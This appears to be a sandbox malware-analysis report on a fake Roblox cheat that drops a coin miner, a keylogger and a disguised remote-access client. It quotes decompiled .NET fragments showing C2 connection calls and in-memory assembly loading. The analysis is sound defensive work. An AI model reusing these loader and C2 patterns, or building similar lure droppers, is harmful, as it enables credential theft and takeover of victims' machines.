            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,10681821834965854716,2612252034697891369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: Google Drive.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: cheat_roblox.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: cheat_roblox.exeStatic file information: File size 2675335 > 1048576
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: cheat_roblox.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB1F6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: cheat_roblox.exe
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{w3NlLrUpwn05JMopXTd8mSE7UP5bcp._9YAUzJ19chMfqFNJ6TCoEOI8QxrQHh,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.YxYN6QWQIWu5XVAci3urjI00UEnFJ7,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.CCtpPZimJrMU8onPEHRRYLPAiv05nO,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.MfOa5980QCPNnU9x3V9dVBMB71uRJj,dtVFTVK0Ux3SN1R.iCtkLrztKkZDBFY()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N3zhZ0gcLgaQW9k[2],dtVFTVK0Ux3SN1R.By4JChD42wKAESJEe0khbaDthCWknJS4g49dw5i7eJRFccFB(Convert.FromBase64String(N3zhZ0gcLgaQW9k[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: Memory
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: LT2zntgXTGjsdzj2afFrTKkcoonKiN System.AppDomain.Load(byte[])
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq System.AppDomain.Load(byte[])
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq
            Source: msedge.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: msedge.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: msedge.exe.0.dr, Messages.cs.Net Code: Memory
            Source: RobloxPlayerInstaller.exe.0.drStatic PE information: 0xADBEC9FB [Mon May 15 23:38:35 2062 UTC]
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_4795703Jump to behavior
            Source: cheat_roblox.exeStatic PE information: section name: .didat
            Source: cheat_roblox.exeStatic PE information: section name: _RDATA
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E55166 push rsi; retf 0_2_00007FF6E7E55167
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E55156 push rsi; retf 0_2_00007FF6E7E55157
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_010E3175 push ecx; ret 4_2_010E3188
            Source: Keyloger.exe.0.dr, albqjOvwCQYLvRXxiGyhIpdY44vi5RLlo7VzM72FUP7qbNEq.csHigh entropy of concatenated method names: '_4MOkoXT607b9ZVv18hCOaQeksKQK1QY2Z59Hgn3vnGNBTDWY', 'aoVp1bvo8BQemLHmXPz6S0y0KAL2MZMS1pG20J1rmkO1yH36', 'yAFN5ozhCBuI45z4NTpIpiKfB19pUh9mAx6dQVO83WEQzG9S', '_1ORCLm148GvAasbvzvKe0j3op', 'xz4IVJsbdqQjT3fvrAzMqnpUJ', 'd5IEku84RPpe3jqqxUoOxlid9', 'baJVbebdBRSG0vXeqpQbaFGhF', 'PdROi8GC1qEzGAZ3jL0JM4kS1', '_4vWYxVH7giIuQNZUquEn1HcOH', 'iweLYuR0sjls7DY5DlgNakVEM'
            Source: Keyloger.exe.0.dr, qPFRCBxxevtOrm6kkA6S3T0BVLfQqKPGErYWluL1k515NkyAjTBIKTN89KogayXJPuAweWS9osecqggfc7KqoqU1.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'OvBZh7NuYxNyoawDWVgb1bvQvny4ey9hxzXnZmUKYwMyHV3G', 'D1pK9yah6bW1RSKhi0bojd7k0gErawVt3UAqXVftOOGZ8Ek7', 'Amz2GUO9F3xqCrSqrojRM1z27y3P33TQxbcBuP2jeOuVoQ0I', 'XrVGbup25w9XJj82jHd5OO6JqCynsc4QvmRbz66DPHV276dk'
            Source: Keyloger.exe.0.dr, tMXwX3tWlMuOZgJ.csHigh entropy of concatenated method names: 'LjeIsJHhRum59xL', '_6RsfQAJJYyt0J9HkPqIBAQeU380h3KOSQt3dHGv6rcNETpFQfgCb6boQcTnPkAwvsrPG8NTTAwKpmugXZhP', 'zaWTERDp5aT0SDSKgqc0pwq0a7ceYdFVq33bH5rm90KOgrgYcf23ikS2yDHBmgzl4t2KKfhUgFaKblNJ5k3', 'sWVdXUK0j8UTqkeKJ34zN69ydPubFvVaflAAl1XEpkV2r1QsYGAgJphVMO9CuJcZXSLKFk9ZU4EZ9kNpbPz', 'lFKVqnfF4sk3NIn44QcIBHZEg'
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csHigh entropy of concatenated method names: '_0c5jTYhRyonOUDziLx9bjo6xsSexAe', '_25wKNHm120NsmF8qQvTNtHz3RfwaXK', 'viLdoQDOYFFpv6KJ7CRK3qfhhqjyZ8', 'oyu0xUeMkLUDSGAbVhHha949466V1K', 'Vl9igX7Uc5X0UR61FqWGnXY9OhKp3l', '_5AqL7zP7f68dYFzd47NqgQFLffkmOs', 'HrBKo0STAWa5C612O2nnGfOgnFiJTT', 'EZ9n76FqTYmhSSOefwFVuL5ThwtwlO', 'E14zUxLx5YeoVLmDYLzZ6cZw9IN0jq', 'zBGEheUMvhUAXOJ5xyiI8x2n5H3mDM'
            Source: Keyloger.exe.0.dr, dtVFTVK0Ux3SN1R.csHigh entropy of concatenated method names: '_7YMtWoQN5HfGCSK', 'OkqS6ol8M17XMmP', 'uNW6GrfQGz1M2XM', 'Ii6cHrN7BYLDzEF', '_5aJsNyLDXOhokOb', '_9vn0AlUd8GUTBri', 'JvICn3rRI6iioCk', 'UWKlns5zDZ2WYha', '_7hsyClPI7F56lLF', 'oG7pcy3sU6P1wO9'
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.csHigh entropy of concatenated method names: 'yz3ulHWN9n14oJZA9i5vmrxphpzaCp', 'LT2zntgXTGjsdzj2afFrTKkcoonKiN', 'RVfS3lUZ13RpRJx', '_36yQU5duIkCbW2T', 'xm86z0xRhaJxcNt', 'meydQmflaU7lI44', 'ulkLjOcP0yxW7UI', 'b6Kn4aSdInWG889', 'buvrIstkF8NGBRb', 'YEEc5g9ZTXWiw5i'
            Source: Keyloger.exe.0.dr, 3hMB2la9XyjPtIBDiudYxRNIVlJFvm.csHigh entropy of concatenated method names: 'LfvVtvqV46cUkGAPMYI4VquR3SMv2D', 'vIoAF5cBXshvrNilb2DuPcULPAXNvn', 'kA8SgQYodhg33g9XqJGDIcdyDuU2eq', 'lQv3wZATHx75FgR1TEYl60evq1ah4O', 'PSUdXouR3XnWp7uzoDx9bmHtKpUEQn', 'hianEuAU3qLDiz0mgrS8dJ9EtIpg4FKSm', '_1Uzw1Jv75GWN68eZuqAFXHg859jSuA3VZ', 'Nm7Liat39gbXWFp1qqe6HHX35VDFiL7Da', 'i9EMzetgnoZiy3VF71knEPeukHZBiLL2k', 'jUtPhbUZdmJ9iBO2Yt3x7WmdMEVCHS7NK'
